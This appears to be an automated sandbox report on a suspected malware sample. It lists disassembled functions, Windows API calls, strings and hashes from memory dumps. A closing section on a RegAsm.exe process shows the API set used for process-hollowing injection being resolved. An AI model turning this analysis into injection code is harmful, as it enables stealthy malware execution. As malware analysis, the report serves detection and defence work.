Opcode Fuzzy Hash: 9e0aa047749780028b62ec3f4c31f4836bc5b28e49d191b2a8dc19e2150103cb
Instruction Fuzzy Hash: F001BCB5A00228DFCB05EB20DC5153D7B61BF85754B044008EA4197396CF7EAA42EBC1

Function 00FFE112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00FFE0C3,?,?,00000000,?,?,?,00FFE1ED,00000002,FlsGetValue,010191A8,FlsGetValue), ref: 00FFE11F
GetLastError.KERNEL32(?,00FFE0C3,?,?,00000000,?,?,?,00FFE1ED,00000002,FlsGetValue,010191A8,FlsGetValue,?,?,00FFD03B), ref: 00FFE129
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00FFE151

Strings

api-ms-, xrefs: 00FFE136

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: d794ab02dfd118f1569b9823a9fcb34f78e25653615b7690ab2c20497a4bb9de
Instruction ID: 18047eda2d5b68458f2b75fde2cbc08a9d881113b06b8dd7f99b7cd660a96198
Opcode Fuzzy Hash: d794ab02dfd118f1569b9823a9fcb34f78e25653615b7690ab2c20497a4bb9de
Instruction Fuzzy Hash: 52E04834680309F7EF211E61DC05F683B55AF00F54F204420FA4DA81F4DB7A9950A685

Function 0100A3BB Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(9B609FF6,00000000,00000000,?), ref: 0100A41E

Part of subcall function 0100CF52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01009F97,?,00000000,-00000008), ref: 0100CFFE

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0100A679
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0100A6C1
GetLastError.KERNEL32 ref: 0100A764

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: c8c3247f528ce92d070d462b5a1eff09489adfc66d3afadd557729d51adbf374
Instruction ID: 1cca1b2c70e9a2409b79c238fd3861c47b71409f82b87f70dd056914df4e10ab
Opcode Fuzzy Hash: c8c3247f528ce92d070d462b5a1eff09489adfc66d3afadd557729d51adbf374
Instruction Fuzzy Hash: 76D15C75E00248DFEB16CFA8D880AEDBBF4FF48314F18856AE596E7291D734A941CB50

Function 00FFD131 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00FFD1F8
___AdjustPointer.LIBCMT ref: 00FFD21B
___AdjustPointer.LIBCMT ref: 00FFD2B7

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ab23eaf61a7254c491e497765016a258b10d6e6170c38f51fd8f1c84bda35588
Instruction ID: 13843aab11aec76675bf92c8f3710f8b95ea62f58233c27a32d13b576c5cd1bb
Opcode Fuzzy Hash: ab23eaf61a7254c491e497765016a258b10d6e6170c38f51fd8f1c84bda35588
Instruction Fuzzy Hash: 9F51E2B2A0430EAFEB299F54D881B7A77A6EF44720F14442DEA15472B1E735ED40FB90

Function 0100D36E Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0100CF52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01009F97,?,00000000,-00000008), ref: 0100CFFE

GetLastError.KERNEL32 ref: 0100D3D2
__dosmaperr.LIBCMT ref: 0100D3D9
GetLastError.KERNEL32(?,?,?,?), ref: 0100D413
__dosmaperr.LIBCMT ref: 0100D41A

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: caa5750dbc19cd8529c44b58477d0053a9800d1681501a892f414a1967686cba
Instruction ID: cc2fe9768cdcfd811562c0243439e2465085892210bcaf6708378357240b4fa7
Opcode Fuzzy Hash: caa5750dbc19cd8529c44b58477d0053a9800d1681501a892f414a1967686cba
Instruction Fuzzy Hash: F621B331600206AFBB239FE988809ABB7E9FF45364F448559F999971C0DB31ED408BA0

Function 01003DA6 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f080d8b6ae33b3b50391a2464a2cad1b1fed4e5a581bf215f9f6845d9d7d624a
Instruction ID: 4c29efa676948a52f9e55c5182812981a548882d9809b445e3cadc1fb605f01c
Opcode Fuzzy Hash: f080d8b6ae33b3b50391a2464a2cad1b1fed4e5a581bf215f9f6845d9d7d624a
Instruction Fuzzy Hash: 5E216F31200246AFFB63AF69DC809AB77E9BF113A4F044659E9959B1D0EB31ED408B90

Function 0100E304 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0100E30C

Part of subcall function 0100CF52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,01009F97,?,00000000,-00000008), ref: 0100CFFE

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100E344
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0100E364

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 537566dd929f2f9a9e8c376f634c3032f084eb16f4d41cca532a0f8ea3c25a52
Instruction ID: 1b762b87578a770672e1273da6991ebe07752202ee350a7ed129ef7d1ee85b01
Opcode Fuzzy Hash: 537566dd929f2f9a9e8c376f634c3032f084eb16f4d41cca532a0f8ea3c25a52
Instruction Fuzzy Hash: 811108B15056067E77132B75DC8CCBF7FADDE86194F004528F581E1180EA29DD004271

Function 00FF1FD1 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FF1FDD
int.LIBCPMT ref: 00FF1FF0

Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61

std::_Facet_Register.LIBCPMT ref: 00FF2023
std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2039

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 75e5be8f0673954b637e754ba52cae0eae5fa1735f24e6b76ce1b5f4802c52c1
Instruction ID: 7e6018e68726e8c9bf8066cde1aa8ab0b5449f2df8180e436eea02d12f07c49c
Opcode Fuzzy Hash: 75e5be8f0673954b637e754ba52cae0eae5fa1735f24e6b76ce1b5f4802c52c1
Instruction Fuzzy Hash: 2301A73390052CABCB24EB54DC569BE7768AF40760B140549FB01AB2B1EF78AE41E7D4

Function 00FF1F58 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FF1F64
int.LIBCPMT ref: 00FF1F77

Part of subcall function 00FF2D36: std::_Lockit::_Lockit.LIBCPMT ref: 00FF2D47
Part of subcall function 00FF2D36: std::_Lockit::~_Lockit.LIBCPMT ref: 00FF2D61

std::_Facet_Register.LIBCPMT ref: 00FF1FAA
std::_Lockit::~_Lockit.LIBCPMT ref: 00FF1FC0

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 814781ad2e9b26797b3bbdbbe4881b874193781c6d321f3679ef981ce5fa0f9a
Instruction ID: 156c533df1e767900ce4ed74a89fb535f648c972caad71744ff285a4fd2808f0
Opcode Fuzzy Hash: 814781ad2e9b26797b3bbdbbe4881b874193781c6d321f3679ef981ce5fa0f9a
Instruction Fuzzy Hash: E501A23290051CEBCB24EB64DC459BEB7A9AF40764B100559FA01AB2B1EF78AF41F7D0

Function 010145DF Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000), ref: 010145F6
GetLastError.KERNEL32(?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000,?,?,?,0100AD3F,00000000), ref: 01014602

Part of subcall function 010145C8: CloseHandle.KERNEL32(FFFFFFFE,01014612,?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000,?,?), ref: 010145D8

___initconout.LIBCMT ref: 01014612

Part of subcall function 0101458A: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,010145B9,01012F12,?,?,0100A7B8,?,00000000,00000000,?), ref: 0101459D

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,01012F25,00000000,00000001,00000000,?,?,0100A7B8,?,00000000,00000000,?), ref: 01014627

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 2f502f2c1c5cfe3ce0a5b3f81302961d19c05ce9db52c0bf16b476a668b7ee91
Instruction ID: 066d6a09ecb5fe6bc8f3882c5bb3476d5e8e726612a9e6160d4c51a7de083bbb
Opcode Fuzzy Hash: 2f502f2c1c5cfe3ce0a5b3f81302961d19c05ce9db52c0bf16b476a668b7ee91
Instruction Fuzzy Hash: 82F01C36400319FBCF632FA9DC0498A3F66FB083A1F404110FA9985124C77B8820AB91

Function 0100B95D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000048,00000002,?,00000000,00000048,00000000,00000000,?,?,0100C131), ref: 0100BA38

Strings

@", xrefs: 0100BAF8, 0100BAB3
@", xrefs: 0100B9D9

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: @"$@"
API String ID: 2738559852-1249078637
Opcode ID: 468f0e4ee6174e12a7d82069cd9d339ffbbd99e69d88dee7562be50b8db6ad13
Instruction ID: 37d23add0cd0a4c7fc9dfda7e7b0114dca2f31b1ed4b4b28ffc56417ce76c218
Opcode Fuzzy Hash: 468f0e4ee6174e12a7d82069cd9d339ffbbd99e69d88dee7562be50b8db6ad13
Instruction Fuzzy Hash: 31512635A14206EBFB22CF9CD941AFDB7B0EF1A314F24415AE995A72D0E3749A80C751

Function 00FFCE20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00FFCE5F
__IsNonwritableInCurrentImage.LIBCMT ref: 00FFCF13

Strings

csm, xrefs: 00FFCEFD

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 13a150872da12eaf801e59e9dc3c8673f565784738d8f5da71713f2b0ba2a057
Instruction ID: 3defc4e0cdc4907dd2b3399824fb592fc92afc306fbff260697e63b348bffd66
Opcode Fuzzy Hash: 13a150872da12eaf801e59e9dc3c8673f565784738d8f5da71713f2b0ba2a057
Instruction Fuzzy Hash: A341B530E0021D9BCF10DF68CC44ABEBBB5BF45324F148055EA15AB3A6D7359A15EBD1

Function 00FFD72D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 00FFD752

Strings

RCC, xrefs: 00FFD76C
MOC, xrefs: 00FFD764

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: fc9c898f4a1c0c1e968bd2fbbc24a0c05e2581cd8dabb3ddab9ff281161c1643
Instruction ID: 82da1c3d5597e54e3fdce2115df661825e5b82efd0ea7691d3cf3999accc7428
Opcode Fuzzy Hash: fc9c898f4a1c0c1e968bd2fbbc24a0c05e2581cd8dabb3ddab9ff281161c1643
Instruction Fuzzy Hash: 6C413772D0020DAFCF16DF94CD81AAEBBB6AF48354F148159FA04A6261D3359950EB51

Function 00FF6055 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00FF60DD
RaiseException.KERNEL32(?,?,?,00FF5190,?,?,?,?,?,?,?,?,?,?,00FF5190,00000001), ref: 00FF6102

Part of subcall function 00FFB012: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,00000000,?,?,00FF560A,?,01021098,00FF1E57,?,00FF1E57), ref: 00FFB072

Part of subcall function 00FFE69B: IsProcessorFeaturePresent.KERNEL32(00000017,00FF1E2E,?,?,?,00FF3AA8,01058E0C,?,?,00FF2949,?,?,?,?,?,00FF143A), ref: 00FFE6B7

Strings

csm, xrefs: 00FF6091

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
String ID: csm
API String ID: 1924019822-1018135373
Opcode ID: 4ddd93586c7321f9791b6630d2c0458fbc51f6834b2ac9ec533bd826f2116ea5
Instruction ID: 334f3febc6c200a8d9ec756ed5ec570588a56a87b5a9dea93a4a799743b1e875
Opcode Fuzzy Hash: 4ddd93586c7321f9791b6630d2c0458fbc51f6834b2ac9ec533bd826f2116ea5
Instruction Fuzzy Hash: 2821A932C0021C9BCF24DE95D945ABEB7B9AF04724F244419E606EB221CF34AD50EB81

Function 00FF23BA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00FF23C1
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00FF23F9

Part of subcall function 00FF67C3: _Yarn.LIBCPMT ref: 00FF67E2
Part of subcall function 00FF67C3: _Yarn.LIBCPMT ref: 00FF6806

Strings

bad locale name, xrefs: 00FF2407

Memory Dump Source

Source File: 00000000.00000002.2070827520.0000000000FF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true

Associated: 00000000.00000002.2070810614.0000000000FF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070852613.0000000001017000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001023000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070870185.0000000001056000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2070924631.000000000105A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ff0000_file.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: 8d6ccef34ecc00be40b6a8c61daf69feb5157e83aedaae8abbcf3e5293467c81
Instruction ID: ec7c9fc6ab8b40d85e4fc42bb0fce6f772931de658eb8837b95346f01f84b27c
Opcode Fuzzy Hash: 8d6ccef34ecc00be40b6a8c61daf69feb5157e83aedaae8abbcf3e5293467c81
Instruction Fuzzy Hash: 56F03071505B449E8330DF7A8881457FBE4BE28620390CE2FE2DEC3A22D734E544CB6A

Analysis Process: RegAsm.exePID: 2780, Parent PID: 6360COMMON

Execution Graph

Execution Coverage:	3.8%
Dynamic/Decrypted Code Coverage:	0.7%
Signature Coverage:	4.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	33

Executed Functions

Function 00418AFD Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,00417EFC), ref: 00418B11
GetProcAddress.KERNEL32 ref: 00418B28
GetProcAddress.KERNEL32 ref: 00418B3F
GetProcAddress.KERNEL32 ref: 00418B56
GetProcAddress.KERNEL32 ref: 00418B6D
GetProcAddress.KERNEL32 ref: 00418B84
GetProcAddress.KERNEL32 ref: 00418B9B
GetProcAddress.KERNEL32 ref: 00418BB2
GetProcAddress.KERNEL32 ref: 00418BC9
GetProcAddress.KERNEL32 ref: 00418BE0
GetProcAddress.KERNEL32 ref: 00418BF7
GetProcAddress.KERNEL32 ref: 00418C0E
GetProcAddress.KERNEL32 ref: 00418C25
GetProcAddress.KERNEL32 ref: 00418C3C
GetProcAddress.KERNEL32 ref: 00418C53
GetProcAddress.KERNEL32 ref: 00418C6A
GetProcAddress.KERNEL32 ref: 00418C81
GetProcAddress.KERNEL32 ref: 00418C98
GetProcAddress.KERNEL32 ref: 00418CAF
GetProcAddress.KERNEL32 ref: 00418CC6
GetProcAddress.KERNEL32 ref: 00418CDD
GetProcAddress.KERNEL32 ref: 00418CF4
GetProcAddress.KERNEL32 ref: 00418D0B
GetProcAddress.KERNEL32 ref: 00418D22
GetProcAddress.KERNEL32 ref: 00418D39
GetProcAddress.KERNEL32 ref: 00418D50
GetProcAddress.KERNEL32 ref: 00418D67
GetProcAddress.KERNEL32 ref: 00418D7E
GetProcAddress.KERNEL32 ref: 00418D95
GetProcAddress.KERNEL32 ref: 00418DAC
GetProcAddress.KERNEL32 ref: 00418DC3
GetProcAddress.KERNEL32 ref: 00418DDA
GetProcAddress.KERNEL32 ref: 00418DF1
GetProcAddress.KERNEL32 ref: 00418E08
GetProcAddress.KERNEL32 ref: 00418E1F
GetProcAddress.KERNEL32 ref: 00418E36
GetProcAddress.KERNEL32 ref: 00418E4D
GetProcAddress.KERNEL32 ref: 00418E64
GetProcAddress.KERNEL32 ref: 00418E7B
GetProcAddress.KERNEL32 ref: 00418E92
GetProcAddress.KERNEL32 ref: 00418EA9
GetProcAddress.KERNEL32 ref: 00418EC0
GetProcAddress.KERNEL32 ref: 00418ED7
GetProcAddress.KERNEL32(CreateProcessA), ref: 00418EED
GetProcAddress.KERNEL32(GetThreadContext), ref: 00418F03
GetProcAddress.KERNEL32(ReadProcessMemory), ref: 00418F19
GetProcAddress.KERNEL32(VirtualAllocEx), ref: 00418F2F
GetProcAddress.KERNEL32(ResumeThread), ref: 00418F45
GetProcAddress.KERNEL32(WriteProcessMemory), ref: 00418F5B
GetProcAddress.KERNEL32(SetThreadContext), ref: 00418F71
LoadLibraryA.KERNEL32(00417EFC,?,00000034,00000032,00414423,004125B9,?,00000040,00000064,004143DA,00413A82,?,0000002C,00000064,00414359,00414396), ref: 00418F82
LoadLibraryA.KERNEL32 ref: 00418F93
LoadLibraryA.KERNEL32 ref: 00418FA4
LoadLibraryA.KERNEL32 ref: 00418FB5
LoadLibraryA.KERNEL32 ref: 00418FC6
LoadLibraryA.KERNEL32 ref: 00418FD7
LoadLibraryA.KERNEL32 ref: 00418FE8
LoadLibraryA.KERNEL32 ref: 00418FF9
LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00419009
GetProcAddress.KERNEL32(75FD0000), ref: 00419024
GetProcAddress.KERNEL32 ref: 0041903B
GetProcAddress.KERNEL32 ref: 00419052
GetProcAddress.KERNEL32 ref: 00419069
GetProcAddress.KERNEL32 ref: 00419080
GetProcAddress.KERNEL32(734B0000), ref: 0041909F
GetProcAddress.KERNEL32 ref: 004190B6
GetProcAddress.KERNEL32 ref: 004190CD
GetProcAddress.KERNEL32 ref: 004190E4
GetProcAddress.KERNEL32 ref: 004190FB
GetProcAddress.KERNEL32 ref: 00419112
GetProcAddress.KERNEL32 ref: 00419129
GetProcAddress.KERNEL32 ref: 00419140
GetProcAddress.KERNEL32(763B0000), ref: 0041915B
GetProcAddress.KERNEL32 ref: 00419172
GetProcAddress.KERNEL32 ref: 00419189
GetProcAddress.KERNEL32 ref: 004191A0
GetProcAddress.KERNEL32 ref: 004191B7
GetProcAddress.KERNEL32(750F0000), ref: 004191D6
GetProcAddress.KERNEL32 ref: 004191ED
GetProcAddress.KERNEL32 ref: 00419204
GetProcAddress.KERNEL32 ref: 0041921B
